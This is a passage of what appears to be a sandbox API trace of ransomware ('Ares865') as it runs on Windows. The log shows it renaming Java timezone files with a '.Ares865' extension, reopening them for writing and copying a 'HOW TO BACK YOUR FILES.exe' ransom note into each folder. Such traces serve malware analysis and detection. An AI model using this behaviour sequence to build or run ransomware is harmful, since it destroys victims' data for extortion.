(x86)\\java\\jre7\\lib\\zi\\asia\\ulaanbaatar.ares865"), dwFlags=0x1) returned 1 [0134.998] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ulaanbaatar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ulaanbaatar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.998] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=437) returned 1 [0135.001] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Urumqi" | out: lpString1="Urumqi") returned="Urumqi" [0135.001] lstrlenW (lpString="Urumqi") returned 6 [0135.001] lstrlenW (lpString="Ares865") returned 7 [0135.002] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Urumqi.Ares865") returned 59 [0135.002] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Urumqi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\urumqi"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Urumqi.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\urumqi.ares865"), dwFlags=0x1) returned 1 [0135.003] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Urumqi.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\urumqi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.004] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=181) returned 1 [0135.007] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Ust-Nera" | out: lpString1="Ust-Nera") returned="Ust-Nera" [0135.007] lstrlenW (lpString="Ust-Nera") returned 8 [0135.007] lstrlenW (lpString="Ares865") returned 7 [0135.007] lstrcmpiW (lpString1="st-Nera", lpString2="Ares865") returned 1 [0135.008] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ust-Nera.Ares865") returned 61 [0135.008] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ust-Nera" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ust-nera"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ust-Nera.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ust-nera.ares865"), dwFlags=0x1) returned 1 [0135.011] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ust-Nera.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ust-nera.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.011] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=597) returned 1 [0135.016] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Vientiane" | out: lpString1="Vientiane") returned="Vientiane" [0135.016] lstrlenW (lpString="Vientiane") returned 9 [0135.016] lstrlenW (lpString="Ares865") returned 7 [0135.016] lstrcmpiW (lpString1="entiane", lpString2="Ares865") returned 1 [0135.017] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vientiane.Ares865") returned 62 [0135.017] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vientiane" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\vientiane"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vientiane.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\vientiane.ares865"), dwFlags=0x1) returned 1 [0135.018] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vientiane.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\vientiane.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.018] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=97) returned 1 [0135.021] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Vladivostok" | out: lpString1="Vladivostok") returned="Vladivostok" [0135.021] lstrlenW (lpString="Vladivostok") returned 11 [0135.022] lstrlenW (lpString="Ares865") returned 7 [0135.022] lstrcmpiW (lpString1="ivostok", lpString2="Ares865") returned 1 [0135.022] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vladivostok.Ares865") returned 64 [0135.022] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vladivostok" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\vladivostok"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vladivostok.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\vladivostok.ares865"), dwFlags=0x1) returned 1 [0135.024] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vladivostok.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\vladivostok.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.024] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=581) returned 1 [0135.027] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Yakutsk" | out: lpString1="Yakutsk") returned="Yakutsk" [0135.027] lstrlenW (lpString="Yakutsk") returned 7 [0135.027] lstrlenW (lpString="Ares865") returned 7 [0135.027] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yakutsk.Ares865") returned 60 [0135.027] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yakutsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yakutsk"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yakutsk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yakutsk.ares865"), dwFlags=0x1) returned 1 [0135.029] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yakutsk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yakutsk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.029] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=581) returned 1 [0135.032] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Yekaterinburg" | out: lpString1="Yekaterinburg") returned="Yekaterinburg" [0135.032] lstrlenW (lpString="Yekaterinburg") returned 13 [0135.032] lstrlenW (lpString="Ares865") returned 7 [0135.032] lstrcmpiW (lpString1="rinburg", lpString2="Ares865") returned 1 [0135.033] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yekaterinburg.Ares865") returned 66 [0135.033] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yekaterinburg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yekaterinburg"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yekaterinburg.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yekaterinburg.ares865"), dwFlags=0x1) returned 1 [0135.034] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yekaterinburg.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yekaterinburg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.035] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=581) returned 1 [0135.037] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Yerevan" | out: lpString1="Yerevan") returned="Yerevan" [0135.037] lstrlenW (lpString="Yerevan") returned 7 [0135.038] lstrlenW (lpString="Ares865") returned 7 [0135.038] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yerevan.Ares865") returned 60 [0135.038] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yerevan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yerevan"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yerevan.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yerevan.ares865"), dwFlags=0x1) returned 1 [0135.040] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yerevan.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yerevan.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.040] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=565) returned 1 [0135.043] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica" [0135.043] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica" [0135.043] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0135.043] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\how to back your files.exe"), bFailIfExists=1) returned 0 [0135.044] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0135.044] GetLastError () returned 0x0 [0135.045] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0135.045] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52bac420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52bac420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0135.045] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0135.045] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0135.045] lstrcpyW (in: lpString1=0x2cce466, lpString2="Casey" | out: lpString1="Casey") returned="Casey" [0135.045] lstrlenW (lpString="Casey") returned 5 [0135.045] lstrlenW (lpString="Ares865") returned 7 [0135.046] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Casey.Ares865") returned 64 [0135.046] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Casey" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\casey"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Casey.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\casey.ares865"), dwFlags=0x1) returned 1 [0135.047] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Casey.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\casey.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.047] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=101) returned 1 [0135.050] lstrcpyW (in: lpString1=0x2cce466, lpString2="Davis.Ares865" | out: lpString1="Davis.Ares865") returned="Davis.Ares865" [0135.050] lstrlenW (lpString="Davis.Ares865") returned 13 [0135.050] lstrlenW (lpString="Ares865") returned 7 [0135.051] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0135.051] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x51, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DumontDUrville", cAlternateFileName="DUMONT~1")) returned 1 [0135.051] lstrcmpiW (lpString1="DumontDUrville", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0135.051] lstrcmpiW (lpString1="DumontDUrville", lpString2="aoldtz.exe") returned 1 [0135.051] lstrcpyW (in: lpString1=0x2cce466, lpString2="DumontDUrville" | out: lpString1="DumontDUrville") returned="DumontDUrville" [0135.051] lstrlenW (lpString="DumontDUrville") returned 14 [0135.051] lstrlenW (lpString="Ares865") returned 7 [0135.051] lstrcmpiW (lpString1="Urville", lpString2="Ares865") returned 1 [0135.051] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\DumontDUrville.Ares865") returned 73 [0135.051] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\DumontDUrville" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\dumontdurville"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\DumontDUrville.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\dumontdurville.ares865"), dwFlags=0x1) returned 1 [0135.053] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\DumontDUrville.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\dumontdurville.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.053] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=81) returned 1 [0135.056] lstrcpyW (in: lpString1=0x2cce466, lpString2="Macquarie" | out: lpString1="Macquarie") returned="Macquarie" [0135.056] lstrlenW (lpString="Macquarie") returned 9 [0135.056] lstrlenW (lpString="Ares865") returned 7 [0135.056] lstrcmpiW (lpString1="cquarie", lpString2="Ares865") returned 1 [0135.057] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Macquarie.Ares865") returned 68 [0135.057] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Macquarie" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\macquarie"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Macquarie.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\macquarie.ares865"), dwFlags=0x1) returned 1 [0135.058] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Macquarie.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\macquarie.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.058] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=785) returned 1 [0135.061] lstrcpyW (in: lpString1=0x2cce466, lpString2="Mawson" | out: lpString1="Mawson") returned="Mawson" [0135.061] lstrlenW (lpString="Mawson") returned 6 [0135.061] lstrlenW (lpString="Ares865") returned 7 [0135.061] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Mawson.Ares865") returned 65 [0135.061] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Mawson" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\mawson"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Mawson.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\mawson.ares865"), dwFlags=0x1) returned 1 [0135.063] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Mawson.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\mawson.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.063] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0135.067] lstrcpyW (in: lpString1=0x2cce466, lpString2="McMurdo" | out: lpString1="McMurdo") returned="McMurdo" [0135.067] lstrlenW (lpString="McMurdo") returned 7 [0135.067] lstrlenW (lpString="Ares865") returned 7 [0135.067] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\McMurdo.Ares865") returned 66 [0135.067] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\McMurdo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\mcmurdo"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\McMurdo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\mcmurdo.ares865"), dwFlags=0x1) returned 1 [0135.069] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\McMurdo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\mcmurdo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.069] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1124) returned 1 [0135.072] lstrcpyW (in: lpString1=0x2cce466, lpString2="Palmer" | out: lpString1="Palmer") returned="Palmer" [0135.072] lstrlenW (lpString="Palmer") returned 6 [0135.072] lstrlenW (lpString="Ares865") returned 7 [0135.072] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Palmer.Ares865") returned 65 [0135.072] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Palmer" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\palmer"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Palmer.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\palmer.ares865"), dwFlags=0x1) returned 1 [0135.074] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Palmer.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\palmer.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.074] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1104) returned 1 [0135.077] lstrcpyW (in: lpString1=0x2cce466, lpString2="Rothera" | out: lpString1="Rothera") returned="Rothera" [0135.077] lstrlenW (lpString="Rothera") returned 7 [0135.077] lstrlenW (lpString="Ares865") returned 7 [0135.078] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Rothera.Ares865") returned 66 [0135.078] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Rothera" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\rothera"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Rothera.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\rothera.ares865"), dwFlags=0x1) returned 1 [0135.079] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Rothera.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\rothera.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.079] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.082] lstrcpyW (in: lpString1=0x2cce466, lpString2="Syowa" | out: lpString1="Syowa") returned="Syowa" [0135.082] lstrlenW (lpString="Syowa") returned 5 [0135.082] lstrlenW (lpString="Ares865") returned 7 [0135.083] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Syowa.Ares865") returned 64 [0135.083] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Syowa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\syowa"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Syowa.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\syowa.ares865"), dwFlags=0x1) returned 1 [0135.084] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Syowa.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\syowa.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.084] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.087] lstrcpyW (in: lpString1=0x2cce466, lpString2="Vostok" | out: lpString1="Vostok") returned="Vostok" [0135.087] lstrlenW (lpString="Vostok") returned 6 [0135.087] lstrlenW (lpString="Ares865") returned 7 [0135.088] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Vostok.Ares865") returned 65 [0135.088] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Vostok" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\vostok"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Vostok.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\vostok.ares865"), dwFlags=0x1) returned 1 [0135.089] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Vostok.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\vostok.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.089] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.092] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America" [0135.093] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America" [0135.093] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0135.093] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\how to back your files.exe"), bFailIfExists=1) returned 0 [0135.094] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0135.094] GetLastError () returned 0x0 [0135.094] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0135.094] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\*", lpFindFileData=0x2cce1b0 | out: 